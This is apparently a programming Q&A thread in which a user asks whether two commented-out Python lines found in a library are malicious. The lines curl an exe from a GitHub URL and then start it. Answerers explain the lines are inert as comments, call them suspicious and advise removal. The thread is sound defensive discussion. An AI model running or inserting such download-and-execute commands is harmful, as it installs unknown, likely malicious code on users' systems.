# Is this code that downloads and runs an exe from github malicious?

Tags: python, virus

**Please do not run any of this code if you don't know what that is!**

I found this in a library

```
# os.system(r"curl --silent https://raw.githubusercontent.com/Swe4rX/test/main/WinStartupApplicationDLL.exe --output tmp.exe")
# os.system("start tmp.exe")
```

Is there anything bad going on? I really want to know because I've ran it in the past.
My friend told me it doesn't do anything because there's that `#` symbol in front of the strings but I want to ask more experienced people.

Answer (score 2):

If this code weren't commented out, it'd use `curl` to download an `exe` file from GitHub and execute it locally. I haven't analyzed this executable or ran it on my machine, but unless you know **exactly** what it is, the best practice would be to assume it's malicious. These lines are indeed commented out so they wouldn't execute, but on the other hand, if you didn't put them and you don't need them - just remove them.

Comment: IOW, if that code wasn't a comment, it would download arbitrary code off the internet and run it, and that code could (likely would) be malicious.

Comment: At least it looks commented out here. Wasn't something like that in the news recently, where code looked differently than what it actually was? I'd delete the entire file/library, its author is highly suspect.

Comment: @AKX should have stressed that more, I agree. Edited.

Comment: [Trojan Source](https://trojansource.codes/) is what I meant.

Answer (score 1):

Your friend is correct; the `#` at the start of the line marks it as a *comment*, so Python doesn't execute the line. It's very suspicious-looking code, though. You definitely wouldn't want to uncomment it and run it.